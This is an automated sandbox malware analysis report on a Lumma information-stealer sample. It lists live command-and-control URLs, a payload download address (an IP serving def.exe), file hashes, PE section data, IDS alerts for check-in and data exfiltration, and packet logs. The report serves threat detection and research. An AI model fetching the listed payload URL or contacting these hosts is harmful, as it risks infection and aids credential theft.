https://crisiwarny.store/apiP-	file.exe, 00000000.00000003.2124393205.0000000005E35000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2125805969.0000000005E39000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2148529577.0000000005E39000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2129029760.0000000005E39000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2141448822.0000000005E39000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2127812697.0000000005E39000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2126194869.0000000005E39000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2126017190.0000000005E39000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2128672323.0000000005E39000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2127070717.0000000005E39000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2125616453.0000000005E39000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2128020421.0000000005E39000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2129262094.0000000005E39000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2126680781.0000000005E39000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2129756991.0000000005E39000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2253187496.0000000005E28000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2155177011.0000000005E27000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2124702808.0000000005E39000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2128238916.0000000005E39000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.2272666225.0000000005E39000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2127372157.0000000005E39000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://crisiwarny.store/Y	file.exe, 00000000.00000003.2141585744.00000000017FB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142747663.00000000017FA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142625341.00000000017F7000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	file.exe, 00000000.00000003.2111115009.00000000060BC000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://ac.ecosia.org/autocomplete?q=	file.exe, 00000000.00000003.2084212152.0000000005DCC000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2084274235.0000000005DC9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2084373731.0000000005DC9000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://185.215.113.16/	file.exe, 00000000.00000002.2262641819.00000000017CD000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2253625013.00000000017C8000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://crisiwarny.store/5e9f	file.exe, 00000000.00000003.2111053218.00000000017FB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2110280342.00000000017FB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2109706634.00000000017FA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2109984852.00000000017FB000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://crisiwarny.store:443/apiLE=user-PCUSERNAME=userUSERPROFILE=C:	file.exe, 00000000.00000002.2262641819.00000000017CD000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2253625013.00000000017C8000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://185.215.113.16/B	file.exe, 00000000.00000002.2262641819.00000000017CD000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2253625013.00000000017C8000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg	file.exe, 00000000.00000003.2111402565.0000000005E29000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://x1.c.lencr.org/0	file.exe, 00000000.00000003.2110155391.0000000005E9D000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://x1.i.lencr.org/0	file.exe, 00000000.00000003.2110155391.0000000005E9D000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	file.exe, 00000000.00000003.2084212152.0000000005DCC000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2084274235.0000000005DC9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2084373731.0000000005DC9000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://185.215.113.16/off/def.exev	file.exe, 00000000.00000002.2262641819.00000000017CD000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2253625013.00000000017C8000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://crt.rootca1.amazontrust.com/rootca1.cer0?	file.exe, 00000000.00000003.2110155391.0000000005E9D000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://crisiwarny.store/0	file.exe, 00000000.00000003.2155306590.00000000017FD000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://185.215.113.16/off/def.exe	file.exe, 00000000.00000003.2253625013.00000000017C8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2261876972.0000000001783000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2261446385.000000000133A000.00000004.00000010.00020000.00000000.sdmp	false		unknown
https://crisiwarny.store/	file.exe, 00000000.00000003.2124561103.00000000017FB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2253655039.00000000017FB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2109641062.0000000005E34000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2141585744.00000000017FB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2253625013.00000000017C8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142747663.00000000017FA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2263039938.00000000017FD000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142625341.00000000017F7000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://crisiwarny.store/alt-	file.exe, 00000000.00000003.2124561103.00000000017FB000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://support.mozilla.org/products/firefoxgro.all	file.exe, 00000000.00000003.2111115009.00000000060BC000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	file.exe, 00000000.00000003.2084212152.0000000005DCC000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2084274235.0000000005DC9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2084373731.0000000005DC9000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://crisiwarny.store/api3	file.exe, 00000000.00000003.2155306590.00000000017EB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2253538805.00000000017E3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2253697863.00000000017ED000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://crisiwarny.store/apiu	file.exe, 00000000.00000003.2155306590.00000000017EB000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://crisiwarny.store/r	file.exe, 00000000.00000003.2124561103.00000000017FB000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://crisiwarny.store/t	file.exe, 00000000.00000003.2111053218.00000000017FB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2110280342.00000000017FB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2109706634.00000000017FA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2109984852.00000000017FB000.00000004.00000020.00020000.00000000.sdmp	false		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
104.21.95.91	crisiwarny.store	United States		13335	CLOUDFLARENETUS	true
185.215.113.16	unknown	Portugal		206894	WHOLESALECONNECTIONSNL	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1543207
Start date and time:	2024-10-27 12:12:08 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 29s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	6
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	file.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@3/2@2/2
EGA Information:	Successful, ratio: 50%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target file.exe, PID 1400 because there are no executed function
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: file.exe

Simulations

Behavior and APIs

Time	Type	Description
07:13:01	API Interceptor	10x Sleep call for process: file.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.21.95.91	file.exe	Get hash	malicious	LummaC	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, RedLine, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse
	file.exe	Get hash	malicious	LummaC	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc	Browse
	CheatInjector.exe	Get hash	malicious	LummaC	Browse
185.215.113.16	file.exe	Get hash	malicious	LummaC	Browse	185.215.113.16/off/def.exe
	SecuriteInfo.com.Win32.Evo-gen.20836.29869.exe	Get hash	malicious	LummaC	Browse	185.215.113.16/off/def.exe
	file.exe	Get hash	malicious	LummaC	Browse	185.215.113.16/off/def.exe
	file.exe	Get hash	malicious	LummaC	Browse	185.215.113.16/off/def.exe
	file.exe	Get hash	malicious	LummaC	Browse	185.215.113.16/off/def.exe
	file.exe	Get hash	malicious	LummaC	Browse	185.215.113.16/off/def.exe
	S92Ayq3U9A.exe	Get hash	malicious	LummaC	Browse	185.215.113.16/off/def.exe
	file.exe	Get hash	malicious	LummaC	Browse	185.215.113.16/off/def.exe
	D18h1ni3ZU.exe	Get hash	malicious	LummaC	Browse	185.215.113.16/off/def.exe
	file.exe	Get hash	malicious	LummaC	Browse	185.215.113.16/off/def.exe

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
crisiwarny.store	file.exe	Get hash	malicious	LummaC	Browse	172.67.170.64
	file.exe	Get hash	malicious	LummaC	Browse	172.67.170.64
	file.exe	Get hash	malicious	LummaC	Browse	104.21.95.91
	file.exe	Get hash	malicious	LummaC	Browse	172.67.170.64
	file.exe	Get hash	malicious	LummaC	Browse	172.67.170.64
	file.exe	Get hash	malicious	LummaC	Browse	172.67.170.64
	file.exe	Get hash	malicious	LummaC	Browse	172.67.170.64
	file.exe	Get hash	malicious	LummaC	Browse	172.67.170.64
	file.exe	Get hash	malicious	LummaC	Browse	172.67.170.64
	file.exe	Get hash	malicious	LummaC	Browse	172.67.170.64

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	file.exe	Get hash	malicious	LummaC	Browse	172.67.170.64
	file.exe	Get hash	malicious	LummaC	Browse	172.67.170.64
	nklm68k.elf	Get hash	malicious	Unknown	Browse	172.68.224.89
	splarm7.elf	Get hash	malicious	Unknown	Browse	141.101.119.135
	nabx86.elf	Get hash	malicious	Unknown	Browse	104.21.62.94
	SecuriteInfo.com.Win32.Evo-gen.20836.29869.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	splx86.elf	Get hash	malicious	Unknown	Browse	104.27.44.51
	file.exe	Get hash	malicious	LummaC	Browse	104.21.95.91
	sh4.elf	Get hash	malicious	Mirai	Browse	1.3.103.28
	file.exe	Get hash	malicious	LummaC	Browse	172.67.170.64
WHOLESALECONNECTIONSNL	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.206
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.206
	file.exe	Get hash	malicious	LummaC	Browse	185.215.113.16
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.206
	SecuriteInfo.com.Win32.Evo-gen.20836.29869.exe	Get hash	malicious	LummaC	Browse	185.215.113.16
	file.exe	Get hash	malicious	LummaC	Browse	185.215.113.16
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.206
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.206
	file.exe	Get hash	malicious	LummaC	Browse	185.215.113.16
	file.exe	Get hash	malicious	LummaC	Browse	185.215.113.16

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	file.exe	Get hash	malicious	LummaC	Browse	104.21.95.91
	file.exe	Get hash	malicious	LummaC	Browse	104.21.95.91
	SecuriteInfo.com.Win32.Evo-gen.20836.29869.exe	Get hash	malicious	LummaC	Browse	104.21.95.91
	file.exe	Get hash	malicious	LummaC	Browse	104.21.95.91
	file.exe	Get hash	malicious	LummaC	Browse	104.21.95.91
	file.exe	Get hash	malicious	LummaC	Browse	104.21.95.91
	https://duy38.r.ag.d.sendibm3.com/mk/cl/f/sh/1t6Af4OiGsF30wT9TF4ckLf3fAzx5z/28D7HenRXzOU	Get hash	malicious	LummaC	Browse	104.21.95.91
	order confirmation.exe	Get hash	malicious	DBatLoader, FormBook	Browse	104.21.95.91
	Flech.exe	Get hash	malicious	LummaC	Browse	104.21.95.91
	8itMk7loon.exe	Get hash	malicious	LummaC	Browse	104.21.95.91

Process:	C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	226
Entropy (8bit):	5.360398796477698
Encrypted:	false
SSDEEP:	6:Q3La/xw5DLIP12MUAvvR+uTL2ql2ABgTv:Q3La/KDLI4MWuPTAv
MD5:	3A8957C6382192B71471BD14359D0B12
SHA1:	71B96C965B65A051E7E7D10F61BEBD8CCBB88587
SHA-256:	282FBEFDDCFAA0A9DBDEE6E123791FC4B8CB870AE9D450E6394D2ACDA3D8F56D
SHA-512:	76C108641F682F785A97017728ED51565C4F74B61B24E190468E3A2843FCC43615C6C8ABE298750AF238D7A44E97C001E3BE427B49900432F905A7CE114AA9AD
Malicious:	false
Reputation:	high, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..

C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2720768
Entropy (8bit):	6.4747911144313015
Encrypted:	false
SSDEEP:	49152:/6mFVgCW8sXaL/V07PZCYQaUmXxfjwvj:imFVg/8o+904YQaZkv
MD5:	20660C078959F3893C738609A956DEA5
SHA1:	EB17A1D93F6897C36F4E4293123ECB9270D95A83
SHA-256:	5C2926FF0F3BD51D581D5A3D78ACD42CCF504C7DFC7725BB1D754780B768ABFE
SHA-512:	28F9EE45676211B8EDBAE0A0E26E817570E96BD51B468E870D8A3FBDBCF0A048E053E30E2F9B29B6D7D38166D666FBFA9EBF9111C304E08DE4C91054B53624C9
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	MZ......................@...........z...................................!..L.!This program cannot be run in DOS mode....$.......PE..L...P(,e.........."...0..$.............. ...`....@.. .......................@.....?&...`.................................U...i....`.............................................................................................................. . .@... ....... ..............@....rsrc........`.......2..............@....idata . ...........8..............@...lckjivxs.@)......")..:..............@...pqfzdyos. ....)......\).............@....taggant.@......"...b).............@...................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.496862296250228
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	file.exe
File size:	3'000'320 bytes
MD5:	84eeaf8b6dac33d7e5de9256769ca8c8
SHA1:	eb1e3025548095128a6602d062d180192e7e88b1
SHA256:	58700ccf44cdd5f10ce7711543d93401dcd4e6328195173d25ffc6eba42bddc7
SHA512:	f0056be1d7f23a94f80be1a864feacc4eee16ed0a5c3154931c72374e1091967fcdcbe2d662b50d9f7ee20142c41a5485dfdf6a6bb78924a92338831a238fa7d
SSDEEP:	49152:H3Dr4N+sLnEbyYWFrs0+BtWfRTAtnK9U:zsN+sLnEbPOrs0+BtWfRTA9
TLSH:	06D53BE1B449B2CBD48E53785527CF86992D06F84B2409C3AC6DB4B97E73ED111BEC28
File Content Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...S..g.................J............0...........@...........................1.....Y.....@.................................T...h..

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x70e000
Entrypoint Section:	.taggant
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x6715D353 [Mon Oct 21 04:06:43 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	2eabe9054cad5152567f0699947a2c5b

Entrypoint Preview

Instruction
jmp 00007F661C7F546Ah

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x5a054	0x68	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x5a1f8	0x8	.idata
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
	0x1000	0x58000	0x27e00	1de39fa913e00b4d27c2b5bc74cbd582	False	0.9981264694357367	data	7.982977832144119	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x59000	0x1000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x5a000	0x1000	0x200	555a11fa24a077379003c187d9c9d020	False	0.14453125	data	0.9996515881509258	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
wbrzvzgu	0x5b000	0x2b2000	0x2b1200	8cf6122ef9bd06e21ea6d93092d42f5b	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
gwyfrlto	0x30d000	0x1000	0x400	5f7e09e818fd7c676eece1f130e9f793	False	0.8095703125	data	6.287249648865603	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant	0x30e000	0x3000	0x2200	24dad7f976747f33ac0b2e4b8ac95cc5	False	0.09225643382352941	DOS executable (COM)	1.052007691604815	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Imports

DLL	Import
kernel32.dll	lstrcpy

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-27T12:13:04.262944+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.5	49704	104.21.95.91	443	TCP
2024-10-27T12:13:04.262944+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	49704	104.21.95.91	443	TCP
2024-10-27T12:13:05.450304+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.5	49705	104.21.95.91	443	TCP
2024-10-27T12:13:05.450304+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	49705	104.21.95.91	443	TCP
2024-10-27T12:13:11.348881+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.5	49709	104.21.95.91	443	TCP
2024-10-27T12:13:12.717726+0100	2843864	ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2	1	192.168.2.5	49710	104.21.95.91	443	TCP
2024-10-27T12:13:15.913204+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	49711	104.21.95.91	443	TCP
2024-10-27T12:13:16.838489+0100	2019714	ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile	2	192.168.2.5	49712	185.215.113.16	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 27, 2024 12:13:02.749116898 CET	49704	443	192.168.2.5	104.21.95.91
Oct 27, 2024 12:13:02.749170065 CET	443	49704	104.21.95.91	192.168.2.5
Oct 27, 2024 12:13:02.749414921 CET	49704	443	192.168.2.5	104.21.95.91
Oct 27, 2024 12:13:02.750870943 CET	49704	443	192.168.2.5	104.21.95.91
Oct 27, 2024 12:13:02.750895023 CET	443	49704	104.21.95.91	192.168.2.5
Oct 27, 2024 12:13:03.373776913 CET	443	49704	104.21.95.91	192.168.2.5
Oct 27, 2024 12:13:03.374005079 CET	49704	443	192.168.2.5	104.21.95.91
Oct 27, 2024 12:13:03.377475023 CET	49704	443	192.168.2.5	104.21.95.91
Oct 27, 2024 12:13:03.377511024 CET	443	49704	104.21.95.91	192.168.2.5
Oct 27, 2024 12:13:03.378014088 CET	443	49704	104.21.95.91	192.168.2.5
Oct 27, 2024 12:13:03.425040960 CET	49704	443	192.168.2.5	104.21.95.91
Oct 27, 2024 12:13:03.754878044 CET	49704	443	192.168.2.5	104.21.95.91
Oct 27, 2024 12:13:03.754878044 CET	49704	443	192.168.2.5	104.21.95.91
Oct 27, 2024 12:13:03.755075932 CET	443	49704	104.21.95.91	192.168.2.5
Oct 27, 2024 12:13:04.262808084 CET	443	49704	104.21.95.91	192.168.2.5
Oct 27, 2024 12:13:04.262917995 CET	443	49704	104.21.95.91	192.168.2.5
Oct 27, 2024 12:13:04.263195992 CET	49704	443	192.168.2.5	104.21.95.91
Oct 27, 2024 12:13:04.264590025 CET	49704	443	192.168.2.5	104.21.95.91
Oct 27, 2024 12:13:04.264612913 CET	443	49704	104.21.95.91	192.168.2.5
Oct 27, 2024 12:13:04.264650106 CET	49704	443	192.168.2.5	104.21.95.91
Oct 27, 2024 12:13:04.264657974 CET	443	49704	104.21.95.91	192.168.2.5
Oct 27, 2024 12:13:04.314618111 CET	49705	443	192.168.2.5	104.21.95.91
Oct 27, 2024 12:13:04.314682007 CET	443	49705	104.21.95.91	192.168.2.5
Oct 27, 2024 12:13:04.314764023 CET	49705	443	192.168.2.5	104.21.95.91
Oct 27, 2024 12:13:04.315045118 CET	49705	443	192.168.2.5	104.21.95.91
Oct 27, 2024 12:13:04.315077066 CET	443	49705	104.21.95.91	192.168.2.5
Oct 27, 2024 12:13:04.943186998 CET	443	49705	104.21.95.91	192.168.2.5
Oct 27, 2024 12:13:04.943291903 CET	49705	443	192.168.2.5	104.21.95.91
Oct 27, 2024 12:13:04.944523096 CET	49705	443	192.168.2.5	104.21.95.91
Oct 27, 2024 12:13:04.944541931 CET	443	49705	104.21.95.91	192.168.2.5
Oct 27, 2024 12:13:04.944921970 CET	443	49705	104.21.95.91	192.168.2.5
Oct 27, 2024 12:13:04.946140051 CET	49705	443	192.168.2.5	104.21.95.91
Oct 27, 2024 12:13:04.946161032 CET	49705	443	192.168.2.5	104.21.95.91
Oct 27, 2024 12:13:04.946233034 CET	443	49705	104.21.95.91	192.168.2.5
Oct 27, 2024 12:13:05.450262070 CET	443	49705	104.21.95.91	192.168.2.5
Oct 27, 2024 12:13:05.450371027 CET	443	49705	104.21.95.91	192.168.2.5
Oct 27, 2024 12:13:05.450412989 CET	443	49705	104.21.95.91	192.168.2.5
Oct 27, 2024 12:13:05.450445890 CET	443	49705	104.21.95.91	192.168.2.5
Oct 27, 2024 12:13:05.450485945 CET	443	49705	104.21.95.91	192.168.2.5
Oct 27, 2024 12:13:05.450592041 CET	49705	443	192.168.2.5	104.21.95.91
Oct 27, 2024 12:13:05.450592995 CET	49705	443	192.168.2.5	104.21.95.91
Oct 27, 2024 12:13:05.450620890 CET	443	49705	104.21.95.91	192.168.2.5
Oct 27, 2024 12:13:05.450695992 CET	443	49705	104.21.95.91	192.168.2.5
Oct 27, 2024 12:13:05.450819016 CET	49705	443	192.168.2.5	104.21.95.91
Oct 27, 2024 12:13:05.450824022 CET	443	49705	104.21.95.91	192.168.2.5
Oct 27, 2024 12:13:05.450839043 CET	443	49705	104.21.95.91	192.168.2.5
Oct 27, 2024 12:13:05.450983047 CET	49705	443	192.168.2.5	104.21.95.91
Oct 27, 2024 12:13:05.502819061 CET	49705	443	192.168.2.5	104.21.95.91
Oct 27, 2024 12:13:05.502827883 CET	443	49705	104.21.95.91	192.168.2.5
Oct 27, 2024 12:13:05.549856901 CET	49705	443	192.168.2.5	104.21.95.91
Oct 27, 2024 12:13:05.569520950 CET	443	49705	104.21.95.91	192.168.2.5
Oct 27, 2024 12:13:05.569654942 CET	443	49705	104.21.95.91	192.168.2.5
Oct 27, 2024 12:13:05.569706917 CET	49705	443	192.168.2.5	104.21.95.91
Oct 27, 2024 12:13:05.569724083 CET	443	49705	104.21.95.91	192.168.2.5
Oct 27, 2024 12:13:05.569859982 CET	443	49705	104.21.95.91	192.168.2.5
Oct 27, 2024 12:13:05.570027113 CET	49705	443	192.168.2.5	104.21.95.91
Oct 27, 2024 12:13:05.570027113 CET	49705	443	192.168.2.5	104.21.95.91
Oct 27, 2024 12:13:05.570540905 CET	49705	443	192.168.2.5	104.21.95.91
Oct 27, 2024 12:13:05.570563078 CET	443	49705	104.21.95.91	192.168.2.5
Oct 27, 2024 12:13:05.681962013 CET	49706	443	192.168.2.5	104.21.95.91
Oct 27, 2024 12:13:05.682013035 CET	443	49706	104.21.95.91	192.168.2.5
